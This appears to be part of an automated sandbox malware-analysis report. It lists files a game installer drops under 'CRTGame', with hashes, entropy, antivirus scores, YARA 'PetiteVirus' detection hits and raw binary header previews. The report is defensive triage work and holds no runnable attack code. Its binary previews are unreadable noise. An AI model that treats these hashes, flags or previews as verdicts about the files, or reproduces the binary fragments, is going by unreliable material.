File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112640
Entropy (8bit):	6.540227486061059
Encrypted:	false
SSDEEP:	1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
MD5:	BDB65DCE335AC29ECCBC2CA7A7AD36B7
SHA1:	CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
SHA-256:	7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
SHA-512:	8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-C1J3V.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112640
Entropy (8bit):	6.540227486061059
Encrypted:	false
SSDEEP:	1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
MD5:	BDB65DCE335AC29ECCBC2CA7A7AD36B7
SHA1:	CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
SHA-256:	7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
SHA-512:	8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-CIN2V.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	26126
Entropy (8bit):	6.048294343792499
Encrypted:	false
SSDEEP:	384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
MD5:	D1223F86EDF0D5A2D32F1E2AAAF8AE3F
SHA1:	C286CA29826A138F3E01A3D654B2F15E21DBE445
SHA-256:	E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
SHA-512:	7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-DDN59.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7910
Entropy (8bit):	6.931925007191986
Encrypted:	false
SSDEEP:	192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
MD5:	1268DEA570A7511FDC8E70C1149F6743
SHA1:	1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
SHA-256:	F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
SHA-512:	E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-DDN59.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................\|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..

C:\Program Files (x86)\CRTGame\bin\x86\is-F2AK9.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	294926
Entropy (8bit):	6.191604766067493
Encrypted:	false
SSDEEP:	3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
MD5:	C76C9AE552E4CE69E3EB9EC380BC0A42
SHA1:	EFFEC2973C3D678441AF76CFAA55E781271BD1FB
SHA-256:	574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
SHA-512:	7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........\|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-FLLBO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.192037544202194
Encrypted:	false
SSDEEP:	384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
MD5:	BEFD36FE8383549246E1FD49DB270C07
SHA1:	1EF12B568599F31292879A8581F6CD0279F3E92A
SHA-256:	B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
SHA-512:	FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-FQCKS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	127669
Entropy (8bit):	7.952352167575405
Encrypted:	false
SSDEEP:	3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
MD5:	75C1D7A3BDF1A309C540B998901A35A7
SHA1:	B06FEEAC73D496C435C66B9B7FF7514CBE768D84
SHA-256:	6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
SHA-512:	8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-FQCKS.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...

C:\Program Files (x86)\CRTGame\bin\x86\is-GETG5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	5.1208137218866945
Encrypted:	false
SSDEEP:	24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
MD5:	B7EDCC6CB01ACE25EBD2555CF15473DC
SHA1:	2627FF03833F74ED51A7F43C55D30B249B6A0707
SHA-256:	D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
SHA-512:	962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
Malicious:	false
Preview:	Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH

C:\Program Files (x86)\CRTGame\bin\x86\is-GNGP9.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19008
Entropy (8bit):	7.672481244971812
Encrypted:	false
SSDEEP:	384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
MD5:	8EE91149989D50DFCF9DAD00DF87C9B0
SHA1:	E5581E6C1334A78E493539F8EA1CE585C9FFAF89
SHA-256:	3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
SHA-512:	FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...\|...}K...................E..K....p..j...g........Q..........y...........

C:\Program Files (x86)\CRTGame\bin\x86\is-GP3AQ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	867854
Entropy (8bit):	4.9264497464202694
Encrypted:	false
SSDEEP:	12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
MD5:	B476CA59D61F11B7C0707A5CF3FE6E89
SHA1:	1A1E7C291F963C12C9B46E8ED692104C51389E69
SHA-256:	AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
SHA-512:	D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p..........................................................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc..........,..................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-GV5KO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315918
Entropy (8bit):	6.5736483262229735
Encrypted:	false
SSDEEP:	6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
MD5:	201EA988661F3D1F9CA5D93DA83425E7
SHA1:	D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
SHA-256:	4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
SHA-512:	6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-IQEKE.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34392
Entropy (8bit):	7.81689943223162
Encrypted:	false
SSDEEP:	768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
MD5:	EA245B00B9D27EF2BD96548A50A9CC2C
SHA1:	8463FDCDD5CED10C519EE0B406408AE55368E094
SHA-256:	4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
SHA-512:	EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-J1FBL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36752
Entropy (8bit):	7.780431937344781
Encrypted:	false
SSDEEP:	768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
MD5:	9FF783BB73F8868FA6599CDE65ED21D7
SHA1:	F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
SHA-256:	E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
SHA-512:	C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x\|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p.....X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..\|....J

C:\Program Files (x86)\CRTGame\bin\x86\is-J36DT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	772608
Entropy (8bit):	6.546391052615969
Encrypted:	false
SSDEEP:	6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
MD5:	B3B487FC3832B607A853211E8AC42CAD
SHA1:	06E32C28103D33DAD53BE06C894203F8808D38C1
SHA-256:	30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
SHA-512:	FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

C:\Program Files (x86)\CRTGame\bin\x86\is-J5DR2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8456
Entropy (8bit):	6.767152008521429
Encrypted:	false
SSDEEP:	192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
MD5:	19E08B7F7B379A9D1F370E2B5CC622BD
SHA1:	3E2D2767459A92B557380C5796190DB15EC8A6EA
SHA-256:	AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
SHA-512:	564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-J5DR2.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...\|.

C:\Program Files (x86)\CRTGame\bin\x86\is-JKH63.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35588
Entropy (8bit):	7.817557274117395
Encrypted:	false
SSDEEP:	768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
MD5:	58521D1AC2C588B85642354F6C0C7812
SHA1:	5912D2507F78C18D5DC567B2FA8D5AE305345972
SHA-256:	452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
SHA-512:	3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-JKH63.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(

C:\Program Files (x86)\CRTGame\bin\x86\is-JM3DF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	123406
Entropy (8bit):	6.263889638223575
Encrypted:	false
SSDEEP:	1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
MD5:	B49ECFA819479C3DCD97FAE2A8AB6EC6
SHA1:	1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
SHA-256:	B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
SHA-512:	18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................\|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-KHKMO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	227328
Entropy (8bit):	6.641153481093122
Encrypted:	false
SSDEEP:	6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
MD5:	BC824DC1D1417DE0A0E47A30A51428FD
SHA1:	C909C48C625488508026C57D1ED75A4AE6A7F9DB
SHA-256:	A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
SHA-512:	566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-LOMUV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39304
Entropy (8bit):	7.819409739152795
Encrypted:	false
SSDEEP:	768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
MD5:	C7A50ACE28DDE05B897E000FA398BBCE
SHA1:	33DA507B06614F890D8C8239E71D3D1372E61DAA
SHA-256:	F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
SHA-512:	4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
Malicious:	false
